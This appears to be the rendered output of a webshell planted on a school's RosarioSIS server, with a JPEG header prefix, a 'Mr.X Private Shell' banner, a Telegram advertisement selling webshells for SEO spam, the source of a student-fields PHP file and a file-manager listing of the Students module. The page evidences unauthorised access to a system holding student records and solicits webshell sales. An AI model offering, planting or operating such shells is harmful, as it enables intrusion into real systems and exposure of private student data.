����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* Student Fields
*
* @since 4.6 Merge Address Fields & Contact Fields programs with Student Fields program
*
* @package RosarioSIS
* @subpackage modules
*/
require_once 'ProgramFunctions/Fields.fnc.php';
DrawHeader( ProgramTitle() );
$_REQUEST['id'] = issetVal( $_REQUEST['id'], '' );
$_REQUEST['category_id'] = issetVal( $_REQUEST['category_id'], '' );
$_REQUEST['category'] = issetVal( $_REQUEST['category'], '' );
if ( $_REQUEST['category'] === 'address' )
{
require_once 'modules/Students/includes/AddressFields.php';
}
elseif ( $_REQUEST['category'] === 'contact' )
{
require_once 'modules/Students/includes/PeopleFields.php';
}
else
{
require_once 'modules/Students/includes/StudentFields.php';
}
/**
* Fields Category Menu
*
* Local function
*
* @since 4.6
*
* @param string $category Category: student|address|contact.
*
* @return string Select Category input.
*/
function _fieldsCategoryMenu( $category )
{
$link = PreparePHP_SELF(
[],
[ 'category', 'category_id', 'id', 'table', 'ML_tables' ]
) . '&category=';
$menu = SelectInput(
$category,
'category',
'<span class="a11y-hidden">' . _( 'Category' ) . '</span>',
[
'student' => _( 'Student Fields' ),
'address' => _( 'Address Fields' ),
'contact' => _( 'Contact Fields' ),
],
false,
'onchange="' . AttrEscape( 'ajaxLink(' . json_encode( $link ) . ' + this.value);' ) . '" autocomplete="off"',
false
);
return $menu;
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| includes | Folder | 0755 |
|
|
| AddDrop.php | File | 2.68 KB | 0644 |
|
| AddUsers.php | File | 3.86 KB | 0644 |
|
| AdvancedReport.php | File | 2.9 KB | 0644 |
|
| AssignOtherInfo.php | File | 13.44 KB | 0644 |
|
| EnrollmentCodes.php | File | 4 KB | 0644 |
|
| Letters.php | File | 8.69 KB | 0644 |
|
| Menu.php | File | 1.93 KB | 0644 |
|
| PrintStudentInfo.php | File | 13.93 KB | 0644 |
|
| Search.inc.php | File | 10.26 KB | 0644 |
|
| Student.php | File | 22.68 KB | 0644 |
|
| StudentBreakdown.php | File | 9.79 KB | 0644 |
|
| StudentFields.php | File | 1.43 KB | 0644 |
|
| StudentLabels.php | File | 2.45 KB | 0644 |
|